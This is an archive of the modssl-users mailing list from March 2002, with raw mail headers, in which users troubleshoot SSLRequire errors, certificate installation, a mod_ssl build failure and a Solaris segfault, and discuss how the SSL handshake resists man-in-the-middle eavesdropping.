unknown (HELO webmail06) ([202.45.84.76]) (envelope-sender ) by localhost (qmail-ldap-1.03) with SMTP for ; 9 Mar 2002 16:59:30 -0000 Message-ID: <14916751.1015693386010.JavaMail.root@webmail06> Date: Sun, 10 Mar 2002 01:03:06 +0800 (HKT) From: Angus Lee To: modssl-users@modssl.org Subject: SSLRequire syntax error Mime-Version: 1.0 Content-Type: text/plain; charset=Big5 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Angus Lee X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, Today I came across the same problem again. The exact error is: [Sun Mar 10 00:57:08 2002] [alert] [client 144.214.221.37] /home/elpt01/scope174/www/protected/.htaccess: SSLRequire: syntax error The syntax of .htaccess is 100% correct as it hasn't been changed in any way after the last system reboot and client authentication to access the file in that directory was successful. The content of .htaccess file is: SSLRequireSSL SSLVerifyClient require SSLVerifyDepth 1 SSLRequire %{SSL_CLIENT_S_DN_Email} eq "chlee@cs.cityu.edu.hk" \ or %{SSL_CLIENT_M_SERIAL} eq "A6" I'm using Oracle Application Server 10.2.2.0. Anything wrong with Apache because it has been up and running and served many client authentication requests recently after its last reboot during Wednesday mid-night. Angus Lee ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 9 20:24:33 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA01699; Sat, 9 Mar 2002 20:23:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id UAA01663; Sat, 9 Mar 2002 20:22:14 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 618AC4CE696; Sat, 9 Mar 2002 20:22:13 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g29JLua81191; Sat, 9 Mar 2002 20:21:56 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailout01.sul.t-online.com id RAA21815; Sat, 9 Mar 2002 17:16:22 +0100 (MET) Received: from fwd00.sul.t-online.de by mailout01.sul.t-online.com with smtp id 16jjIG-0000QS-0B; Sat, 09 Mar 2002 17:02:00 +0100 Received: from newpc (08106369908-0001@[62.158.206.92]) by fwd00.sul.t-online.com with smtp id 16jjI8-1oRLtoC; Sat, 9 Mar 2002 17:01:52 +0100 Message-ID: <014f01c1c783$b9953090$020a0a0a@newpc> From: shans@t-online.de (Stefan Hans) To: "SSL-Alias" Subject: Security Scenario (understanding problem) Date: Sat, 9 Mar 2002 17:01:50 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Sender: 08106369908-0001@t-dialin.net Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: shans@t-online.de (Stefan Hans) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi *, imagine the following scenario: Server: has its own private/public-key pair Client: has the public-key of the server Man-in-the-middle: has the public-key of the server If the client asks the server for a secure connection, the server starts its handshake by sending a suggestion of a private-private-key encryption (encrypted with its private-key). Right so far? Is it possible for the man-in-the-middle to eavesdrop the handshake sequence of server and client, to decrypt it with the servers public-key and to get the private-key of the server-client SSL session for a man-in-the-middle attack? In other words, is it possible to etablish a secure connection in this scenario at all events or do one need necessarily a private/public-key pair on the client-side? Thx in advance Stefan Hans ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 9 21:05:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA03413; Sat, 9 Mar 2002 21:04:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from microanswers.net id VAA03350; Sat, 9 Mar 2002 21:03:07 +0100 (MET) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by microanswers.net (8.11.0/8.11.0) with SMTP id g29KVBR28112 for ; Sat, 9 Mar 2002 14:31:11 -0600 Message-ID: <008b01c1c7a5$0bf93fe0$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: <3744E9AB.13B289B9.B04B2822@netscape.net> Subject: Re: Problems for install a Verisign Certificate Date: Sat, 9 Mar 2002 14:00:22 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear Miguel, I'm rather new to this topic but I think I understand your problem and may have a cure. Put your directives in a section, and you need to point the server to where your CERT and key are stored. I believe you will have already generated the private.key file when you created the private.csr file. These need to match as they are CERT pairs. Something like the following in the httpd.conf file worked for me. SSLCertificateFile /path/to/certdirectory/ssl.crt/private.crt SSLCertificateKeyFile /path/to/certdirectory/ssl.key/private.key I currently have these directives serving the whole server, but as I understand it, one could put these in a section as well, for example with DocumentRoot /www/secureserver/directory (wherever you want to serve up your secure web pages). SSLCertificateFile /path/to/certdirectory/ssl.crt/domain.crt SSLCertificateKeyFile /path/to/certdirectory/ssl.key/domain.key Keep in mind that I have limited understanding but the above HAS worked for me and maybe it will work for you. And from recent discussions here, I've begun to believe that for more that one SSL-enabled host, directives like the following may allow you to host multiple sites. This web site speaks more on this topic, http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2 but is short on examples. (Anyone wanting to provide exact examples that implement multiple SSL implementations, on ONE IP-address, this would be greatly appreciated). I'm sure the answers are out there somewhere but so far, they remain illusive to me. Port 8443 Listen 8443 SSLCertificateFile /path/to/certdirectory/ssl.crt/domain.crt SSLCertificateKeyFile /path/to/certdirectory/ssl.key/domain.key Good luck! Andrew Lietzow The ACL Group, Inc. ----- Original Message ----- From: "Miguel Angel Gomez Animas" To: Sent: Friday, March 08, 2002 8:06 PM Subject: Problems for install a Verisign Certificate > Hi..... > > I need help to install a certificate, by defaul when I installed Linux 7.0 Apache server is installed too. And i didn't have any troubles to able de SSL server, as you know, by default is installed a demo certificate. I need to change this certificate by a verisign certificate. > > Let me explain the process to create the csr requirement. > > 1.- In he directory /etc/httpd/conf/ssl.crt execute the follow command: > openssl req -new -nodes -keyout private.key -out public.csr > > And Filled the fields with the necesary data ( State, City, Email...etc..) > It generate a privated key named public.csr > > This file (public.csr) I used for request in Verisign, I requested a Trail ID,and thay email me back a key. > > 2.- The key that Verisign send me back I saved in the directory /etc/httpd/conf/ssl.crt with the name server.crt > > 3.- I restarted the apache webserver, but this error appear: > > Starting httpd: [FAILED] > > > Can you tell me what is wrong.... maybe I lost some step.... > > I really apreciate your help....Thnaks a lot!!! > > Regards!!!! > > -- > ________________________________________ > Miguel Angel Gómez Animas > mailto:miguelangelga@netscape.net > URL: http://sites.netscape.net/miguelangelga/homepage > > > > __________________________________________________________________ > Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/ > > Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/ > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 10 00:16:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA12001; Sun, 10 Mar 2002 00:15:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from zolera.com id AAA11997; Sun, 10 Mar 2002 00:15:07 +0100 (MET) Received: from zolera.com (pool-141-154-56-254.bos.east.verizon.net [141.154.56.254]) by zolera.com (8.11.6/8.11.6) with ESMTP id g29NFiX32563; Sat, 9 Mar 2002 18:15:44 -0500 Message-ID: <3C8A9767.AD24D841@zolera.com> Date: Sat, 09 Mar 2002 18:14:47 -0500 From: Rich Salz X-Mailer: Mozilla 4.73 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Stefan Hans CC: SSL-Alias Subject: Re: Security Scenario (understanding problem) References: <014f01c1c783$b9953090$020a0a0a@newpc> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Rich Salz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > If the client asks the server for a secure connection, the server starts its > handshake by sending a suggestion of a private-private-key encryption > (encrypted with its private-key). > > Right so far? No. Totally wrong. Suggest you read more about the protocol details. A key (sic) point is that the client helps generate the session key, encrypted in the server's public key. /r$ -- Zolera Systems, Securing web services (XML, SOAP, Signatures, Encryption) http://www.zolera.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 10 04:13:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA20404; Sun, 10 Mar 2002 04:12:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id EAA20375; Sun, 10 Mar 2002 04:11:29 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sat, 9 Mar 2002 19:00:06 -0800 Received: from 66.185.85.79 by lw10fd.law10.hotmail.msn.com with HTTP; Sun, 10 Mar 2002 03:00:06 GMT X-Originating-IP: [66.185.85.79] From: "krish lankan" To: modssl-users@modssl.org Date: Sat, 09 Mar 2002 22:00:06 -0500 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 10 Mar 2002 03:00:06.0671 (UTC) FILETIME=[AEC2A1F0:01C1C7DF] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "krish lankan" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users i want to be removed from this list _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 10 14:53:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA15040; Sun, 10 Mar 2002 14:52:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id OAA15022; Sun, 10 Mar 2002 14:51:24 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id E86224CE718; Sun, 10 Mar 2002 14:51:23 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2AB53a02590; Sun, 10 Mar 2002 12:05:03 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id VAA04489; Sat, 9 Mar 2002 21:28:06 +0100 (MET) Date: Sat, 9 Mar 2002 21:28:06 +0100 (MET) Message-Id: <200203092028.VAA04489@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] PRIVATE: Build and install the SSL-aware Apache (PR#670) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Peter Stoehr Version: mod_ssl-2.8.5-1.3.22 OS: SuSE Linux 7.1 (Kernel 2.2.18) Submission from: (NULL) (212.17.86.61) Hello mod_ssl-Team! I used the Step-by-Step installation illustration on your modssl.org site. I've build OpenSSL well. After this, i tried the next step (nr.3): I started in the mod_ssl directory like next: $ ./configure \ --with-apache=../apache_1.3.22 \ --with-ssl=../openssl-0.9.6c \ --prefix=/usr/local/httpd Then it started and the massages were: Configuring mod_ssl/2.8.5 for Apache/1.3.22 + Apache location: ../apache_1.3.22 (Version 1.3.22) + OpenSSL location: ../openssl-0.9.6c + Auxiliary patch tool: ./etc/patch/patch (local) + Applying packages to Apache source tree: o Extended API (EAPI) o Distribution Documents o SSL Module Source o SSL Support o SSL Configuration Additions o SSL Module Documentation o Addons Done: source extension and patches successfully applied. Configuring for Apache, Version 1.3.22 + using installation path layout: Apache (config.layout) configure:Error: No such module named 'ssl' ./configure:Error: APACI failed I really don't know, what the program wants. I also checked the FAQ and on the usenet, but I can't find any answer. Perhaps you could help me. Regarding the question, why I don't use Apache 1.3.23 is, that the new webserver of our organisation runs on 1.3.22, so I'll tried to make a second server only for testing. Perhaps you also know a apache-site in german or a german forum for talking about apache and modules. Kind regards from Vienna Peter Stoehr Pink Advertising www.gaynet.at ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 10 15:02:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA15370; Sun, 10 Mar 2002 15:01:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA15330; Sun, 10 Mar 2002 15:00:13 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 0929F4CE757; Sun, 10 Mar 2002 15:00:13 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2ADsa805210; Sun, 10 Mar 2002 14:54:36 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id JAA01757; Sun, 10 Mar 2002 09:04:04 +0100 (MET) Date: Sun, 10 Mar 2002 09:04:04 +0100 (MET) Message-Id: <200203100804.JAA01757@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] mod_ssl segfaults under Solaris 2.8 (PR#671) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Ari D Jordon Version: 2.8.7 OS: Solaris 2.8 Submission from: (NULL) (68.49.144.213) using apache 1.3.23, starting httpd with -DSSL immediately seg faults. post mortem revealed it was dying in ssl_cmd_SSLEngine, specifically in that mySrvConfig() was returning 0. not quite sure if this is a problem with mod_ssl or apache itself, as mySrvConfig is a define for ap_get_module_config. any suggestions would be appreciated. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 10 17:05:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA20306; Sun, 10 Mar 2002 17:04:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA20272; Sun, 10 Mar 2002 17:03:21 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 1A5B34CE755; Sun, 10 Mar 2002 17:03:21 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2AG29T07195; Sun, 10 Mar 2002 17:02:09 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id PAA16377; Sun, 10 Mar 2002 15:18:05 +0100 (MET) Date: Sun, 10 Mar 2002 15:18:05 +0100 (MET) Message-Id: <200203101418.PAA16377@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] mod_ssl segfaults under Solaris 2.8 (PR#671) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, Mar 10, 2002 at 09:04:04AM +0100, modssl-bugdb@modssl.org wrote: > Full_Name: Ari D Jordon > Version: 2.8.7 > OS: Solaris 2.8 > Submission from: (NULL) (68.49.144.213) > > > using apache 1.3.23, starting httpd with -DSSL immediately seg faults. post > mortem revealed it was dying in ssl_cmd_SSLEngine, specifically in that > mySrvConfig() was returning 0. not quite sure if this is a problem with mod_ssl > or apache itself, as mySrvConfig is a define for ap_get_module_config. any > suggestions would be appreciated. Are you using the engine version of openssl? Unless you have a supported crypto accelerator, then you shouldn't be using the engine version. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 10 17:27:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA21347; Sun, 10 Mar 2002 17:26:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id RAA21319; Sun, 10 Mar 2002 17:25:04 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id LAA15029 for ; Sun, 10 Mar 2002 11:30:29 -0500 Date: Sun, 10 Mar 2002 11:30:29 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: [BugDB] mod_ssl segfaults under Solaris 2.8 (PR#671) In-Reply-To: <200203101418.PAA16377@opensource.ee.ethz.ch> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, 10 Mar 2002 modssl-bugdb@modssl.org wrote: > On Sun, Mar 10, 2002 at 09:04:04AM +0100, modssl-bugdb@modssl.org wrote: > > Full_Name: Ari D Jordon > > Version: 2.8.7 > > OS: Solaris 2.8 > > Submission from: (NULL) (68.49.144.213) > > > > > > using apache 1.3.23, starting httpd with -DSSL immediately seg faults. post > > mortem revealed it was dying in ssl_cmd_SSLEngine, specifically in that > > mySrvConfig() was returning 0. not quite sure if this is a problem with mod_ssl > > or apache itself, as mySrvConfig is a define for ap_get_module_config. any > > suggestions would be appreciated. > > Are you using the engine version of openssl? Unless you have a supported > crypto accelerator, then you shouldn't be using the engine version. > But, it should not make a difference if he is should it? The documentation for the engine version states: NOTES ===== openssl-engine-0.9.6.tar.gz does not depend on openssl-0.9.6.tar, you do not need to download both. openssl-engine-0.9.6.tar.gz is usable even if you don't have an external crypto device. The internal OpenSSL functions are contained in the engine "openssl", and will be used by default. No external crypto device is chosen unless you say so. You have actively tell the openssl utility commands to use it through a new command line switch called "-engine". And if you want to use the ENGINE library to do something similar, you must also explicitely choose an external crypto device, or the built-in crypto routines will be used, just as in the default OpenSSL distribution. So the engin version should be compatible with the non-engine version unless there has been something I have missed in the list here or elsewhere? Thanks, Ron DuFresne -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 11 00:19:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA12479; Mon, 11 Mar 2002 00:18:37 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta4-rme.xtra.co.nz id AAA12303; Mon, 11 Mar 2002 00:17:47 +0100 (MET) Received: from there ([210.86.52.77]) by mta4-rme.xtra.co.nz with SMTP id <20020310231739.YSZG14382.mta4-rme.xtra.co.nz@there> for ; Mon, 11 Mar 2002 12:17:39 +1300 Content-Type: text/plain; charset="iso-8859-1" From: Geoff Thorpe To: modssl-users@modssl.org Subject: Re: [BugDB] mod_ssl segfaults under Solaris 2.8 (PR#671) Date: Mon, 11 Mar 2002 12:18:29 +1300 X-Mailer: KMail [version 1.3.1] References: <200203101418.PAA16377@opensource.ee.ethz.ch> In-Reply-To: <200203101418.PAA16377@opensource.ee.ethz.ch> MIME-Version: 1.0 Message-Id: <20020310231739.YSZG14382.mta4-rme.xtra.co.nz@there> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id AAA12420 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Geoff Thorpe X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, On Monday 11 March 2002 03:18, modssl-bugdb@modssl.org wrote: > Are you using the engine version of openssl? Unless you have a supported > crypto accelerator, then you shouldn't be using the engine version. I can assure you that it should make no difference. The only reason the non-engine version existed at 0.9.6 was to give developers more lead-time to adjusting their to the subtle API changes in the engine version. Using the engine version without specifying an engine should work just as the non-engine version as far as mod_ssl is concerned. Cheers, Geoff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 11 10:40:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA05569; Mon, 11 Mar 2002 10:39:28 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA05550; Mon, 11 Mar 2002 10:39:01 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 713174CE753; Mon, 11 Mar 2002 10:39:01 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2B69uM18441; Mon, 11 Mar 2002 07:09:56 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id RAA22116; Sun, 10 Mar 2002 17:55:07 +0100 (MET) Date: Sun, 10 Mar 2002 17:55:07 +0100 (MET) Message-Id: <200203101655.RAA22116@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] mod_ssl segfaults under Solaris 2.8 (PR#671) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, Mar 10, 2002 at 11:30:29AM -0500, R. DuFresne wrote: > > So the engin version should be compatible with the non-engine version > unless there has been something I have missed in the list here or > elsewhere? > It probably is - I just haven't seen that error before, so it was an obvious place to start. BTW: when replying to [BugDB] postings, then please let your replies go to modssl-bugdb@modssl.org - that way they will go into the bug database and get sent automagically to the list. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 11 13:32:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA14410; Mon, 11 Mar 2002 13:31:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id NAA14362; Mon, 11 Mar 2002 13:30:06 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 632074CE693; Mon, 11 Mar 2002 13:30:06 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2BCH2A23249; Mon, 11 Mar 2002 13:17:02 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id HAA28927; Mon, 11 Mar 2002 07:44:09 +0100 (MET) Date: Mon, 11 Mar 2002 07:44:09 +0100 (MET) Message-Id: <200203110644.HAA28927@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] mod_ssl segfaults under Solaris 2.8 (PR#671) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----==-=-=---=-====--==-==-====--==--=-==--=--==- Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed At 03:18 PM 3/10/2002 +0100, you wrote: On Sun, Mar 10, 2002 at 09:04:04AM +0100, modssl-bugdb@modssl.org wrote: > Full_Name: Ari D Jordon > Version: 2.8.7 > OS: Solaris 2.8 > Submission from: (NULL) (68.49.144.213) > > > using apache 1.3.23, starting httpd with -DSSL immediately seg faults. post > mortem revealed it was dying in ssl_cmd_SSLEngine, specifically in that > mySrvConfig() was returning 0. not quite sure if this is a problem with mod_ssl > or apache itself, as mySrvConfig is a define for ap_get_module_config. any > suggestions would be appreciated. Are you using the engine version of openssl? Unless you have a supported crypto accelerator, then you shouldn't be using the engine version. no, this is the normal version (0.9.6b). we've built ssh against this version, and it works fine. i've done some further experimentation, and this is what i've found: after commenting out the macro version of ap_get_module_config in http_config.h (apache source), i was able to get a better idea of the problem the second paramater passed to ap_get_module_config (ssl_module) seems to have an incorrect value for module_index (19 every time i've traced it). and, each time, conf_vector[module_index] is NULL. not sure if it's a coincidence, but there has been consitently a value in conf_vector[module_index+1]. perhaps something is misconfigured in my apache setup? -----==-=-=---=-====--==-==-====--==--=-==--=--==- Content-Type: application/pgp-signature -----BEGIN PGP MESSAGE----- Version: PGPfreeware 7.0.3 for non-commercial use iQA+AwUBPIxRubu5aMb7oqrkEQIJtACg2h/nQkpBCW7lHwrm+0miZi3YbLEAmNX5 8Z6q9F07VQAWaDYs4e2tCvs= =R8kN -----END PGP MESSAGE----- -----==-=-=---=-====--==-==-====--==--=-==--=--==--- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 11 16:49:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA23334; Mon, 11 Mar 2002 16:48:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from MAIL.pcs.loc id QAA23325; Mon, 11 Mar 2002 16:47:57 +0100 (MET) Received: by mail with Internet Mail Service (5.5.2655.55) id ; Mon, 11 Mar 2002 09:47:50 -0600 Message-ID: From: "Woodraska, Robert J." To: "'modssl-users@modssl.org'" Subject: RE: Security Scenario (understanding problem) Date: Mon, 11 Mar 2002 09:47:49 -0600 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.55) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Woodraska, Robert J." X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users However, read up on dsniff at http://www.monkey.org/~dugsong/dsniff/. It is possible to do a MITM attack, if the client is willing to ignore security warnings and blindly click through error messages about the certificate not matching. -----Original Message----- From: Rich Salz [mailto:rsalz@zolera.com] Sent: Saturday, March 09, 2002 5:15 PM To: Stefan Hans Cc: SSL-Alias Subject: Re: Security Scenario (understanding problem) > If the client asks the server for a secure connection, the server starts its > handshake by sending a suggestion of a private-private-key encryption > (encrypted with its private-key). > > Right so far? No. Totally wrong. Suggest you read more about the protocol details. A key (sic) point is that the client helps generate the session key, encrypted in the server's public key. /r$ -- Zolera Systems, Securing web services (XML, SOAP, Signatures, Encryption) http://www.zolera.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org This email message is for the sole use of the intended recipients and may contain privileged and confidential information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply email and destroy all copies of the original message. Although this email and any attachments are believed to be free of any virus or other defect, which might affect any system into which it is received or opened, it is the responsibility of the recipient to ensure that it is free from virus. Precision Computer Systems accepts no responsibility for any loss or damage arising in any way from its use. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 11 17:48:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA25832; 